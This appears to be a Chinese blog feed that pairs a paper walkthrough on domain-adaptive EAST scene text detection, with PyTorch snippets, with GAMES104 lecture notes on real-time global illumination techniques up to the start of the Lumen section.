        self.inshead = DAInsHead()  # 处理实例级特征的领域分类头。

    def forward(self, img_features):
        """
        Arguments:
            img_features (Tensor): 从输入图像计算得到、用于预测的特征图。

        Returns:
            da_img_features (Tensor): 图像级领域分类结果。
        """
        img_grl_fea = self.grl_img(self.gap(img_features))  # 先经 gap 将特征图压缩为 1x1,再经 grl_img 反转梯度,得到图像级特征。

        da_img_features = self.sigmoid_gap(self.imghead(img_grl_fea))  # 经 imghead 处理反转后的特征,再经 Sigmoid 将每个特征值压缩到 [0, 1] 范围。

        return da_img_features
class EAST(nn.Module):  # EAST 继承自 nn.Module,PyTorch 中所有神经网络模型的基类。
    def __init__(self, pretrained=True):
        super(EAST, self).__init__()
        self.extractor = extractor(pretrained)  # 初始化特征提取器,从输入图像中提取多尺度特征;pretrained=True 时加载预训练权重。
        self.merge = merge()  # 初始化特征融合模块。
        self.output = output()  # 初始化输出模块,生成最终预测。

        self.DomainAdaptation = DomainAdaptationModule()  # 初始化领域自适应模块,对特征进行领域自适应处理。

    def forward(self, x):  # 前向传播:定义输入 x 如何经过网络得到输出。
        C = self.extractor(x)  # 将输入 x 传给特征提取器,得到特征列表 C,其中 C[3] 是最深层的特征图。
        class_domain = self.DomainAdaptation(C[3])  # 将 C[3] 传给领域自适应模块,得到领域分类结果 class_domain。

        # self.merge(C):融合不同层的特征;self.output(...):根据融合后的特征生成最终预测。
        # 返回两个值:模型的最终预测结果和领域自适应模块的输出。
        return self.output(self.merge(C)), class_domain

    3.3 Text Self-Training

​以前的工作已经证明了自训练对领域自适应的有效性。然而,自训练的两个主要问题仍需进一步探讨:伪标签中会出现假阳性(FP,实际没有、预测有)和假阴性(FN,实际有、预测没有),不正确的伪标签会对网络造成非常严重的负面影响。为克服这些问题,TST 被设计用来最小化 FP 和 FN 的不利影响。

    3.3.1 Reducing False Negatives.

    webp

Up:文本自训练的框架。我们利用 SWS 对伪标签中的阳性样本进行过滤,以最大限度地减少假阳性;并选择三分之一置信度较低的阴性样本作为最终阴性样本,以最大程度地减少假阴性。
Down:伪标签的样本空间表示。
(a):弱监督训练可以有效地过滤掉假阴性。
(b):假阳性通过笔画宽度的标准差($\sigma$)和 SWS 过滤掉。

    ​受 [1909.00597] Self-Training and Adversarial Background Regularization for Unsupervised Domain Adaptive One-Stage Object Detection (arxiv.org) 的启发,利用弱监督方式来最小化假阴性的影响。如 EAST 中所定义的,原始分数图损失是

$$L_s=-\sum_{i\in Pos}\beta Y_i^*\log\widehat{Y}_i-\sum_{i\in Neg}(1-\beta)(1-Y_i^*)\log(1-\widehat{Y}_i)$$

​ 其中 $\widehat{Y}=F_s$ 是分数图的预测,$Y^*$ 是真值(ground truth)。

​ 虽然网络通过反向传播学习背景损失(即负样本)来优化,但出现在伪标签中的 $\mathrm{FN}$(被错标为背景的文本)会误导网络。我们假设 $\mathrm{FN}$ 主要通过难负例挖掘被选中,例如模糊的文本和与背景相似的不寻常字体。为了减少 $\mathrm{FN}$ 的不利影响,我们忽略一部分从置信度得分看有可能是前景的背景样本。

​ EAST 的负样本是分数图上的像素:一个被标为负的像素,其预测置信度得分越高,就越有可能实际上是文本(即假阴性)。

​ 因此,我们选择置信度得分最低的一部分负样本像素(例如 $Neg/3$)作为最终的负样本,在图中表示为 $\widehat{Neg}/3$(红线)。相应的数学表达式为 $\widehat{Neg}=\eta\,Neg$,其中 $\eta$ 在所有实验中都设置为 $1/3$。对于那些具有高置信度得分的像素,网络不优化这部分损失。最后,修改后的损失函数定义为:

$$L_{sw}=-\sum_{i\in Pos}\beta Y_i^*\log\widehat{Y}_i-\sum_{i\in\widehat{Neg}}(1-\beta)(1-Y_i^*)\log(1-\widehat{Y}_i)$$
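​按上述规则,负样本的筛选可以写成如下 PyTorch 示意代码(假设性示例,函数与变量名均为说明用途而设,并非原仓库实现):在伪标签标记为背景的像素中,仅保留预测得分最低的 $\eta$ 比例作为最终负样本。

```python
import torch

def select_final_negatives(pred_score, pseudo_label, eta=1.0 / 3):
    # pred_score / pseudo_label: (H, W) 的分数图与伪标签图。
    neg_mask = pseudo_label < 0.5                 # 伪标签中的背景(负样本)像素
    neg_scores = pred_score[neg_mask]
    if neg_scores.numel() == 0:
        return neg_mask
    k = max(1, int(eta * neg_scores.numel()))     # Neg_hat = eta * Neg
    thresh = neg_scores.sort().values[k - 1]      # 第 k 小的得分作为阈值
    # 得分较高(更可能是漏检文本,即假阴性)的负样本不参与背景损失
    return neg_mask & (pred_score <= thresh)
```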

    3.3.2 Reducing False Positives.

与假阴性相对应,假阳性同样会对网络造成严重干扰:自然场景中的一些图案和花纹极易被误识别为文本,导致伪标签不准确。不同于支持区域可靠性分数(SRRS),我们提出了一种更合理的笔画宽度分数(SWS),利用笔画宽度变换(SWT)来评估文本实例的预测框。

$$SRRS(r^*)=\frac{1}{N_s}\sum_{i=1}^{N_s}IoU(r_i,r^*)\cdot P(c^*|r_i)$$

​EAST 是一种基于分割的方法,没有区域建议机制;面积大的文本实例拥有的支持框($r_i$)比面积小的多,支持框数量($N_s$)随实例面积而变化,因此 SRRS 并不适用。另一方面,SWT 对于消除非文本区域更合理,类似的先前工作已经显示了其有效性。SWT 是一个局部图像算子,计算每个像素最可能的笔画宽度:其输出是一个 $n\times m$ 矩阵,每个元素包含与该像素相关联的笔画宽度。具体地说,笔画边界上的每个像素沿梯度方向与笔画的相对一侧相连,连接线的宽度即该像素的笔画宽度。SWS 利用相应笔画宽度的信息对预测框进行评估,并消除部分非文本区域,如图 3(蓝线)所示。对于典型的文本区域,笔画宽度的变化很小,因为文本倾向于保持固定的笔画宽度。我们将第 $v$ 个预测框中笔画宽度的集合表示为 $W^v_n$,并将第 $u$ 个像素的笔画宽度表示为 $w^v_u\in W^v_n$。标准差如下:

$$\sigma_v=\sqrt{\frac{1}{N}\sum_{u=1}^{N}\left(w_u^v-\mu^v\right)^2}$$

​其中 $\mu^v$ 是第 $v$ 个预测框中的平均笔画宽度。因此,每个预测框都有一个关于笔画宽度的标准差($\sigma$),我们用上限阈值($\epsilon_1$)选择可靠的框。此外,我们还通过 SWS 进一步过滤框:

    $$SWS_v=\frac{w_v}{\sigma_v^2}$$

​$w_v$ 是第 $v$ 个预测框中最常见的笔画宽度值。通过用下限阈值 $\epsilon_2$ 对分数进行阈值化,进一步筛选预测框。图 3(b)显示部分 FP 被 SWS 和 $\sigma$ 滤除。
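​整个过滤流程可以概括为如下示意代码(假设性示例;各框的笔画宽度由 SWT 预先算出,阈值取后文实现细节中的 3.0 与 0.30):先用标准差 $\sigma_v$ 的上限 $\epsilon_1$ 过滤,再用 $SWS_v=w_v/\sigma_v^2$ 的下限 $\epsilon_2$ 过滤。

```python
import numpy as np

def filter_boxes_by_sws(stroke_widths_per_box, eps1=3.0, eps2=0.30):
    # stroke_widths_per_box: 每个预测框内各像素的笔画宽度(由 SWT 得到)。
    kept = []
    for v, widths in enumerate(stroke_widths_per_box):
        w = np.asarray(widths, dtype=np.float64)
        sigma = w.std()                        # 笔画宽度的标准差 sigma_v
        if sigma > eps1:                       # 上限阈值 eps1:宽度变化过大,剔除
            continue
        vals, counts = np.unique(np.round(w), return_counts=True)
        w_mode = vals[counts.argmax()]         # 最常见的笔画宽度 w_v(取整后取众数)
        sws = w_mode / max(sigma ** 2, 1e-6)   # SWS_v = w_v / sigma_v^2
        if sws >= eps2:                        # 下限阈值 eps2
            kept.append(v)
    return kept
```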

    4 Experiments

​通过将场景文本检测器从合成数据集迁移到真实数据集来评估所提出的方法。我们采用几个纯合成数据集和真实场景数据集(如 SynthText 和 ICDAR2015),它们具有相同的标注粒度(即词级)。

    4.1 Dataset and Experimental Settings

    4.1.1 Pure Synthetic Datasets.

• SynthText 是一个包含约 80 万张合成图像的大规模数据集。这些图像通过将自然图像与以随机字体、大小、颜色和方向渲染的文本混合而成,因此非常逼真。

    • VISD 包含与 10k 背景图像合成的 10k 图像。因此,该数据集没有重复的背景图像。丰富的背景图像使该数据集更加多样化。

    4.1.2 Real Datasets.

• ICDAR 2015 是一个面向英文的多方向文本检测数据集,仅包含 1,000 张训练图像和 500 张测试图像。数据集中的场景文本图像由 Google Glass 在不刻意考虑取景、图像质量和视角的情况下拍摄,因此包含大量小的、模糊的和多方向的文本实例。

• ICDAR 2013 在 ICDAR 2013 Robust Reading 竞赛期间发布,面向聚焦(focused)场景文本检测,包含高分辨率英文文本图像,其中 229 张用于训练,233 张用于测试。

    4.1.3 Implementation Details.

​在所有实验中,我们使用 EAST 作为基础网络。遵循原始论文,输入被调整为 512×512,并应用了原论文中使用的所有数据增强。网络使用由 12 幅图像组成的批量输入进行训练,其中 6 幅来自源域,另外 6 幅来自目标域。我们采用 Adam 优化器。所有实验都使用相同的训练策略:

    1. 使用 ATA 对网络进行 80k 次迭代的预训练,以学习域不变特征,
2. 使用预训练的模型生成相应的伪标签(即伪边界框标签和负样本图),然后用生成的伪标签微调预训练模型。在生成伪标签的过程中,我们将笔画宽度过滤参数(对应 $\epsilon_1$、$\epsilon_2$)设置为 3.0 和 0.30。

​所有实验都在常规工作站(CPU:Intel(R) Core(TM) i7-7800X @ 3.50GHz;GPU:GTX 2080 Ti)上进行。

    4.2 Performance Comparison and Analysis

    webp

不同模型在 Syn2Real 场景文本检测数据集上的性能(SynthText/VISD → ICDAR 2015 迁移)。UL 指未标记数据。* 表示 UnrealText 中报告的性能。† 指我们测试得到的性能。

    webp

不同模型在 Syn2Real 场景文本检测数据集上的性能(SynthText/VISD → ICDAR 2013 迁移)。UL 指未标记数据。* 表示 UnrealText 中报告的性能。† 指我们测试得到的性能。

    4.2.1 Synthetic→ ICDAR2015 Transfer.

​表 1 总结了合成 → ICDAR 2015 迁移任务的性能比较。仅使用源域数据训练的 EAST 基线的 F 分数并不理想(使用 SynthText 为 60.5%,使用 VISD 为 64.5%),可视为没有自适应时的下限。结合所提出的方法后,F 分数分别达到 68.0% 和 73.8%,比基线分别提高了 7.5% 和 9.3%。基于字符级标注的 GCN 比基于词级标注的方法性能有所提高,但仍低于我们这种利用自训练和对抗学习的方法。实验结果表明,该方法能够有效缩小源数据和目标数据之间的领域差异。

    4.2.2 Synthetic→ ICDAR2013 Transfer.

​为了进一步验证该方法的有效性,以 ICDAR 2013 为目标域进行了合成到真实的场景文本检测迁移实验,结果报告在表 2 中。具体来说,对于 SynthText → ICDAR 2013 迁移任务,与仅使用源域数据训练的 EAST 基线相比,我们实现了 11.3% 的性能提升。与合成 → ICDAR2015 迁移实验类似,VISD 也被用作对比实验中的源域:在使用 ATA 和 TST 后,该方法比 EAST 基线提升了 6.3%,表明其在减少域偏移方面的有效性。请注意,为公平比较,除添加 ATA 和 TST 之外,所提方法的基础网络和实验设置与 EAST 基线完全相同。

    4.2.3 ICDAR2013→ ICDAR2015 Transfer.

​表 3 显示了 ICDAR 2013 → ICDAR 2015 迁移任务的性能。ICDAR 2013 的标注是矩形框,而 ICDAR 2015 的标注是旋转框,这限制了迁移性能。尽管如此,与仅使用源域数据训练的 EAST 基线相比,我们仍实现了 7.6% 的性能提升。

    webp

不同模型的检测结果示例。第一行是仅使用源域数据训练的基线的结果,第二行是使用所提出方法的结果。

    4.3 Ablation Study

    4.3.1 Component Analysis.

​为了验证所提出方法的有效性,我们在四个数据集上进行了 Syn2Real 迁移任务的消融实验:SynthText、VISD、ICDAR2015 和 ICDAR2013。表 3 显示了实验结果。对于 SynthText→ICDAR2015 迁移任务,使用 TST 和 ATA 后,F 分数分别提高了 4.1% 和 3.5%;此外,我们的方法比基线最多提升 8% 的召回率,表明其在提高模型鲁棒性方面的有效性。结合这两个组件后,所提方法的 F 分数达到 68.0%,比基线绝对提升 7.5%。VISD→ICDAR2015 迁移任务表现更好,因为 VISD 的合成效果更真实:使用我们方法的 F 分数达到 73.8%,比相应基线绝对提升 9.3%。对于 SynthText/VISD→ICDAR2013 的迁移,性能提升同样显著:使用 SynthText 实现了 11.3% 的提升,使用 VISD 实现了 6.3% 的提升。

    webp

所提出方法在 Syn2Real 场景文本检测迁移上的消融研究。“Baseline”表示仅使用源域中的标记数据进行训练;增量一列表示与仅使用源域数据训练的基线相比 F 分数的增加;UL 指未标记数据;“F-target”表示在源域中预训练、并在目标域中使用原始伪边界框进行微调。

    4.3.2 Parameter Sensitivity on TST.

​为了探索 SWS 的阈值参数(即 $\epsilon_1$ 和 $\epsilon_2$)的影响,我们进行了几组对比实验,结果如表 4 所示。由于理想情况下文本区域内笔画宽度的标准差接近于零,我们使用阈值参数 $\epsilon_1$ 过滤预测框;结果表明,在合适的取值下网络性能最好,且性能对该参数的变化不敏感。与 $\epsilon_1$ 类似,我们采用 0.2、0.3、0.4 三个不同的取值验证了 $\epsilon_2$ 的参数敏感性,结果表明 $\epsilon_2$ 取 0.3 是合理的。

    webp

    4.3.3 Qualitative Analysis.

​图 4 展示了合成到真实迁移任务上文本检测结果的四个示例。实验结果表明,该方法提高了模型在不同复杂背景和不同文本下的鲁棒性:如第一列示例所示,TST 消除了一部分 FP 和 FN,而 ATA 帮助模型学习到更具判别性的特征。

    webp

    5 Conclusions

​本文首次提出了一种用于场景文本检测的合成域到真实域的自适应方法,将知识从合成数据(源域)迁移到真实数据(目标域)。提出的文本自训练(TST)有效减少了伪标签中假阴性和假阳性的不利影响,而对抗性文本实例对齐(ATA)帮助网络以对抗方式学习更多域不变特征。我们以 EAST 为基线,在几个常见的合成与真实数据集上评估了所提方法。实验结果表明,该方法在合成到真实的文本检测迁移任务上有很大的改进。

    ]]>
    @@ -877,7 +877,7 @@ /posts/GAMES104-Dynamic%20Global%20Illumination%20and%20Lumen/ - 资源

    课程

    第二十一节:动态全局光照和 Lumen

    Global Illumination (GI)

    全局光照

    The Rendering Equation

    渲染方程

    James Kajiya,”The Rendering Equation.”
    SIGGRAPH 1986.
    Energy equilibrium:

    $L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)L_i(x,\omega_i)\cos\theta_id\omega_i$

    outgoing = emitted + reflected

    Radiance and Irradiance 辐射和辐照度

    webp

    ​这个方程揭示了渲染的规律。

    Global Illumination: Billions of Light Source

全局光照:数十亿光源

    webp

​然而,计算渲染方程的积分并不容易:光线在现实中会经历无数次反射。

    Global Illumination is Matter for Gaming

全局光照对游戏很重要

    webp

​游戏需要全局光照来近似从周围环境反射而来的光照效果。

Monte Carlo Integration

蒙特卡洛积分

    webp

    • How to solve an integral, when it’s too hard to solve it analytically?

      当一个积分很难解析求解时,如何求解它?

    webp

    • Approximate integral with the average of randomly sample values

      随机样本值平均值的近似积分

    Monte Carlo Ray Tracing (Offline)

    蒙特卡罗射线追踪(离线)

    webp

    ​使用蒙特卡洛算法求解渲染方程中的积分。

    Sampling is the Key

    采样是关键

• Noise decreases as the number of samples per pixel increases. The top left shows 1 sample per pixel, and doubles from left to right each square.

  噪声随着每像素采样数的增加而降低。左上角为每像素 1 个样本,每个方格从左到右依次加倍。

    webp

    Sampling : Uniform Sampling

    取样:均匀取样

    webp

$$\begin{aligned}\int_a^b f(x)\,\mathrm{d}x&=\lim_{n\to\infty}\frac{1}{n}\sum_{i=1}^{n}f(x_i)(b-a)\\&=\lim_{n\to\infty}\frac{1}{n}\sum_{i=1}^{n}\frac{f(x_i)}{\frac{1}{b-a}}\end{aligned}$$

    • We are doing uniform random sample, so we have factor $\frac{1}{b-a}$ here

      我们正在进行均匀随机采样,因此这里有因子$\frac{1}{b-a}$

    Probability Distribution Function

    概率分布函数

    webp

$\int_a^b f(x)\,\mathrm{d}x\approx F_n(X)=\frac{1}{n}\sum_{k=1}^{n}\frac{f(X_k)}{PDF(X_k)}$

    Probability Distribution Function

    概率分布函数

• Describes the relative likelihood for this random variable to take on a given value

  描述此随机变量取给定值的相对可能性

    • Higher means more possible to be chosen

      更高意味着更有可能被选择

    Importance Sampling

    重要性采样

    The PDF can be arbitrary, but which is the best?

    PDF 可以是任意的,但哪个是最好的?

    webp

    Importance Sampling : Best PDF for Rendering?

    重要性采样:最佳的 PDF 渲染?

    • Rendering equation:

      渲染方程式:

      $L_o\left(p,\omega_o\right)=\int_{\Omega^+}L_i\left(p,\omega_i\right)f_r\left(p,\omega_i,\omega_o\right)\left(n\cdot\omega_i\right)\mathrm{d}\omega_i$

    • Monte Carlo Integration:

      蒙特卡洛积分:

      $L_o\left(p,\omega_o\right)\approx\frac{1}{N}\sum_{i=1}^{N}\frac{L_i\left(p,\omega_i\right)f_r\left(p,\omega_i,\omega_o\right)\left(n\cdot\omega_i\right)}{p\left(\omega_i\right)}$

    • What’s our f(x)?

      $L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)$

    • What’s our pdf?

      • Uniform: $p(\omega_i)=\frac1{2\pi}$
      • Other pdf? (cosine-weight, GGX)(余弦权重,GGX)
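​下面用一个 Python 小例子对比均匀采样与余弦加权采样(示意实验,非课程代码):在半球上估计 $\int\cos\theta\,\mathrm{d}\omega=\pi$,当 PDF 与被积函数成正比时,估计量的方差显著降低。

```python
import numpy as np

rng = np.random.default_rng(0)
N = 100_000

# 均匀半球采样:p(w) = 1 / (2*pi),此时 cos(theta) ~ U(0, 1)
cos_theta = rng.random(N)
est_uniform = np.mean(cos_theta * 2.0 * np.pi)    # f / p = cos(theta) * 2*pi

# 余弦加权采样:p(w) = cos(theta) / pi,f / p 恒等于 pi,方差为零
cos_theta_c = np.sqrt(rng.random(N))              # cos(theta) = sqrt(u)
est_cosine = np.mean(cos_theta_c / (cos_theta_c / np.pi))

print(est_uniform, est_cosine)                    # 两者都接近 pi ≈ 3.14159
```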

    Importance Sampling : PDF is Matter

    重要性采样:PDF 很重要

    webp

    ​重要性采样比均匀采样渲染出的效果更好。

    Importance Sampling: Cosine and GGX PDF

    重要性采样:余弦和 GGX PDF

    webp

    ​换一种 PDF 会产生不同的渲染效果。

    Reflective Shadow Maps (RSM, 2005)

    Let’s inject light in. (Photon Mapping?)

    反射阴影贴图(RSM,2005)

    让我们注入光线。(光子映射?)

    • Each pixel on the shadow map is a indirect light source

      阴影贴图上的每个像素都是间接光源

    webp

    • How the RSM pixel $X_p$ illuminates position $x$?

      RSM 像素 $X_p$ 如何照亮位置 $X$?

$E_p(x,n)=\phi_p\frac{\max\{0,\langle n_p\mid x-x_p\rangle\}\max\{0,\langle n\mid x_p-x\rangle\}}{\|x-x_p\|^4}$

    • The indirect irradiance at a surface point $x$ can be approximated by summing up the illumination due to all pixel lights.

      表面点 $x$ 处的间接辐照度可以通过将所有像素光的照度相加来近似。

• Do not consider occlusion.

  不考虑遮挡。

$$E(x,n)=\sum_{\text{pixels }p}E_p(x,n)$$
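把上面两个公式直接翻译成代码大致如下(Python 示意,按原文忽略遮挡,变量名为说明而设):

```python
import numpy as np

def rsm_indirect_irradiance(x, n, pixel_lights):
    # pixel_lights: 由 (phi_p, x_p, n_p) 组成的列表,对应 RSM 上的像素光。
    E = 0.0
    for phi_p, x_p, n_p in pixel_lights:
        d = x - x_p
        num = max(0.0, np.dot(n_p, d)) * max(0.0, np.dot(n, -d))
        E += phi_p * num / (np.dot(d, d) ** 2 + 1e-8)  # 分母即 |x - x_p|^4
    return E
```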

    webp

    Cone Tracing with RSM

    使用 RSM 进行锥体追踪

    • Gathering Indirect Illumination

      收集间接照明

      • random sampling RSM pixels

        随机采样 RSM 像素

      • precompute such a sampling pattern and reuse it for all indirect light computations

        预先计算这样的采样模式,并将其重新用于所有间接光计算

    • 400 samples were sufficient

      400 个样本就足够了

        • use Poisson sampling to obtain a more even sample distribution

          使用泊松采样获得更均匀的样本分布

    webp

Sampling pattern example. The sample density decreases and the sample weights (visualized by the disk radius) increase with the distance to the center.

采样模式示例:随着到中心距离的增加,样本密度降低,样本权重(以圆盘半径表示)增大。

    Acceleration with Low-Res Indirect Illumination

    低分辨率间接照明加速

    • Compute the indirect illumination for a low resolution image

      计算低分辨率图像的间接照明

    • For each pixel on full resolution:

      对于全分辨率的每个像素:

      • get its four surrounding low-res samples

        获取其四个周围的低分辨率样本

• validate by comparing normal and world space position

  通过比较法线和世界空间位置进行验证

      • bi-linear interpolation

        双线性插值

• Recompute the left (red pixels)

  重新计算剩余的像素(红色)

    webp

Gears of War 4, Uncharted 4, The Last of Us, etc.

《战争机器 4》《神秘海域 4》《最后生还者》等

    webp

    Thanks, RSM

    Cool Ideas

    很酷的想法

    • Easy to be implemented

      易于实施

    • Photon Injection with RSM

      RSM 的光子注入

    • Cone sampling in mipmap

      mipmap 中的圆锥采样

    • Low-res Indirect illumination with error check

      低分辨率间接照明,带错误检查

    Cons

    缺点

    • Single bounce

      单次反弹

• No visibility check for indirect illumination

  间接光照没有可见性检查

    webp

    Light Propagation Volumes (LPV)

    光传播体积(LPV)

    First introduced in CryEngine 3(SIGGRAPH 2009)

    首次引入 CryEngine 3(SIGGRAPH 2009)

    webp

    • Key Idea

      核心思想

      • Use a 3D grid to propagate radiance from directly illuminated surfaces to anywhere else

        使用 3D 网格将辐射从直接照射的表面传播到其他任何地方

    webp

    Steps

    步骤

1. Generation of radiance point set scene representation

   辐射点集场景表示的生成

2. Injection of point cloud of virtual light sources into radiance volume

   将虚拟光源的点云注入辐射体积

3. Volumetric radiance propagation

   体积辐射传播

4. Scene lighting with final light propagation volume

   用最终的光传播体积为场景照明

    Reflective shadow map generation → Radiance injection → Radiance propagation → Scene lighting

    反射阴影贴图生成→辐射注入→辐射传播→场景照明

“Freeze” the Radiance in Voxel

把辐射“冻结”在体素中

    Light Injection

    光注入

    • Pre-subdivide the scene into a 3D grid

      将场景预细分为 3D 网格

    • For each grid cell, find enclosed virtual light sources

      对于每个网格单元,找到封闭的虚拟光源

    • Sum up their directional radiance distribution

      总结它们的方向辐射分布

• Project to first 2 orders of SHs (4 in total)

  投影到球谐函数(SH)的前两阶(共 4 个系数)

    webp

    Radiance Propagation

    辐射传播

    • For each grid cell, collect the radiance received from each of its 6 faces

      对于每个网格单元,收集从其 6 个面中的每一个面接收到的辐射

• Sum up, and again use SH to represent

  求和,并再次用 SH 表示

    • Repeat this propagation several times till the volume becomes stable

      重复此传播几次,直到体积稳定

    webp

Light with “Limit Speed”?

光的传播有“速度限制”?

    webp

    Sparse Voxel Octree for Real-time Global Illumination (SVOGI)

    稀疏体素八叉树用于实时全局照明(SVOGI)

Voxelization Pass

体素化 Pass

    webp

    Collect Surface Voxels

    收集表面体素

    webp

    webp

• Inject irradiance into voxels from light

  从光源向体素注入辐照度

• Filter irradiance inside the octree

  在八叉树内部对辐照度进行滤波

    Shading with Cone Tracing in Voxel Tree

    体素树中的圆锥体跟踪着色

Pass 2 from the camera

Pass 2:从相机出发

    • Emit some cones based on diffuse + specular BRDF

      基于漫反射 + 镜面反射 BRDF 发射一些锥体

    • Query in octree based on the (growing) size of the cone

      基于圆锥体(增长)大小的八叉树查询

    webp

    Voxelization Based Global Illumination (VXGI)

    基于体素化的全局照明(VXGI)

    webp

    • Store the voxel data in clipmaps

      将体素数据存储在 clipmap 中

      • Multi-resolution texture

        多分辨率纹理

      • Regions near the center have higher spatial resolution

        中心附近的区域具有更高的空间分辨率

      • Seems to map naturally to cone tracing needs

        似乎很自然地映射到锥体跟踪需求

    • A clipmap is easier to build than SVO

      clipmap 比 SVO 更容易构建

  • No nodes, pointers etc., handled by hardware

    无需节点、指针等结构,寻址由硬件处理

• A clipmap is easier to read from

  从 clipmap 中读取数据更容易

    • Clipmap size is (64…256)^3 with 3…5 levels of detail

      Clipmap 大小为(64…256)^3,具有 3…5 个细节级别

  • 16…32 bytes per voxel => 12 MB … 2.5 GB of video memory required

    每个体素 16…32 字节 => 需要 12 MB … 2.5 GB 显存

    Voxel Update and Toroidal Addressing

    体素更新和环形寻址

    • A fixed point in space always maps to the same address in the clipmap

      空间中的固定点总是映射到剪贴图中的同一地址

    • The background shows texture addresses: frac(worldPos.xy / clipmapSize.xy)

      背景显示纹理地址:frac(worldPos.xy / clipmapSize.xy)

    webp

    webp

    Voxelization for Opacity

    不透明度的体素化

    • We have a triangle and a voxel

      我们有一个三角形和一个体素

    • Select the projection plane that yields the biggest projection area

      选择产生最大投影面积的投影平面

    • Rasterize the triangle using MSAA to compute one coverage mask per pixel

      使用 MSAA 对三角形进行光栅化,以计算每个像素的一个覆盖掩模

    • Take the MSAA samples and reproject them onto other planes

      采集 MSAA 样本并将其重新投影到其他平面上

    • Repeat that process for all covered samples

      对所有覆盖的样本重复该过程

• Thicken the result by blurring all the reprojected samples

  通过模糊所有重新投影的样本来加厚结果

    webp

    Voxelization: Directional Coverage

    体素化:定向覆盖

    webp

    Light Injection

    光注入

    • Calculate emittance of voxels that contain surfaces lit by direct lights

      计算包含由直射光照亮的表面的体素的发射度

    • Take information from reflective shadow maps (RSM)

      从反射阴影图(RSM)中获取信息

    webp

    webp

    Shading with Cone Tracing

    使用圆锥体追踪进行着色

    • generate several cones based on BRDF

      基于 BRDF 生成多个锥体

    webp

    Accumulate Voxel Radiance and Opacity along the Path

    沿路径累积体素辐射度和不透明度

$$\begin{aligned}C_{\mathrm{dst}}&\leftarrow C_{\mathrm{dst}}+(1-\alpha_{\mathrm{dst}})C_{\mathrm{src}}\\\alpha_{\mathrm{dst}}&\leftarrow\alpha_{\mathrm{dst}}+(1-\alpha_{\mathrm{dst}})\alpha_{\mathrm{src}}\end{aligned}$$

    webp

    webp

    Problems in VXGI

    VXGI 中的问题

    Incorrect Occlusion (opacity)

    遮挡不正确(不透明)

• naively combine the opacity with alpha blending

  简单地用 alpha 混合来合并不透明度

    Light Leaking

    漏光

• when occlusion wall is much smaller than voxel size

  当遮挡墙远小于体素尺寸时

    webp

    Screen Space Global Illumination (SSGI)

    屏幕空间全局照明(SSGI)

    General Idea

    总体思路

    • Reuse screen-space data

      重复使用屏幕空间数据

    webp

    Radiance Sampling in Screen Space

    屏幕空间中的辐射采样

    For each fragment:

    对于每个片段:

    • Step 1: compute many reflection rays

      步骤 1:计算许多反射光线

    • Step 2: march along ray direction (in depth gbuffer)

      步骤 2:沿射线方向行进(在深度 gbuffer 中)

• Step 3: use color of hit point as indirect lighting

  步骤 3:使用命中点的颜色作为间接光照

    webp

    Linear Raymarching

    线性射线推进

    • General Steps

      一般步骤

      • Step forward at a fixed step size

        以固定步长向前迈进

      • At each step, check depth value

        每一步,检查深度值

    • Features

      特征

      • Fast

        快速

      • May skip thin objects

        可能跳过薄物体

    webp
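线性步进可以用如下 Python 伪实现来说明(示意代码;project 把世界坐标映射为屏幕坐标和深度,属于假设的接口):

```python
import numpy as np

def linear_raymarch(depth_buffer, project, ray_origin, ray_dir,
                    step=0.1, max_steps=256, thickness=0.05):
    p = np.asarray(ray_origin, dtype=np.float64)
    d = np.asarray(ray_dir, dtype=np.float64)
    for _ in range(max_steps):
        p = p + step * d                       # 固定步长前进
        u, v, depth = project(p)               # 投影回屏幕空间
        if not (0 <= u < depth_buffer.shape[1] and 0 <= v < depth_buffer.shape[0]):
            break                              # 离开屏幕范围
        scene_depth = depth_buffer[int(v), int(u)]
        if scene_depth < depth < scene_depth + thickness:
            return (u, v)                      # 命中:用该像素的颜色作为间接光
    return None                                # 未命中(也可能跳过了薄物体)
```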

Hierarchical Tracing

层级追踪

    • Generate min-depth mipmap (pyramid)

      生成最小深度 mipmap(金字塔)

• Stackless ray walk of min-depth mipmap

  对最小深度 mipmap 做无栈的射线遍历

    webp

level = 0;
while (level > -1)
{
    StepCurrentCell();           // 在当前 mip 层级沿射线步进一个格子
    if (above z plane) level++;  // 射线仍在深度之上:升到更粗层级,加大步长
    if (below z plane) level--;  // 射线落到深度之下:降到更细层级检查命中
}

    webp

    Ray Reuse among Neighbor Pixels

    相邻像素间的光线复用

    • Store hitpoint data

      存储命中点数据

• Assume visibility is the same between neighbors

  假设相邻像素之间的可见性相同

• Regard ray to neighbor’s hitpoint as valid

  将指向邻居命中点的光线视为有效

    webp

    Cone Tracing with Mipmap Filtering

    基于 Mipmap 滤波的圆锥跟踪

Estimate footprint of a cone at hit point

估算圆锥在命中点处的覆盖范围(footprint)

    • roughness

      粗糙度

    • distance to hit

      击中距离

    Sample the color mipmap

    对彩色 mipmap 进行采样

    • mip level is determined by footprint

      mip 级别由足迹决定

    Pre-filter color mipmap (pyramid)

    预过滤彩色 mipmap(金字塔)

    webp

    SSGI Summary

    SSGI 总结

    • Pros:

      优点:

      • Fast for glossy and specular reflections

        快速实现光泽和镜面反射

      • Good quality

        质量好

      • No occlusion issues

        无遮挡问题

    • Cons:

      缺点:

      • Missing information outside screen

        屏幕外信息缺失

• Effects of incorrect visibility from neighbor ray reuse

  邻居光线复用中可见性不正确带来的影响

    webp

    Unique Advantages of SSGI

    SSGI 的独特优势

    • Easy to handle close contact shadow

      易于处理近距离接触阴影

    • Precise hit point calculation

      精确的命中点计算

    • Decouple from scene complexity

      与场景复杂性解耦

    • Handle dynamic objects

      处理动态对象

    Lumen

    ​Lumen 是一个实时全局光照系统,由 Epic Games 开发,用于其虚幻引擎(Unreal Engine)。它旨在提高游戏和其他实时应用中的光照效果的真实感。Lumen 可以动态地计算光线的传播、反射和折射,无需事先烘焙光照贴图,因此能更好地适应场景的变化,比如光线源的移动或物体的位置改变。它通过实时计算来模拟复杂的光照效果,比如间接光和反射,使得视觉效果更加自然和沉浸。

    Ray Traces are slow

    光线追踪很慢

• Can only afford 1/2 ray per pixel

  每像素只负担得起 1/2 条光线

    • But quality GI needs hundreds

      但高质量的 GI 需要数百个

    webp

    Sampling is hard

    取样很困难

    Previous real-time work: Irradiance Fields

    以前的实时工作:辐照度场

    • Problems:

      问题:

  • Leaking and over-occlusion

    漏光和过度遮挡

      • Probe placement

        探头放置

      • Slow lighting update

        照明更新缓慢

      • Distinctive flat look

        独特的扁平外观

    Previous real-time work: Screen Space Denoiser

    以前的实时工作:屏幕空间去噪器

    • Problems:

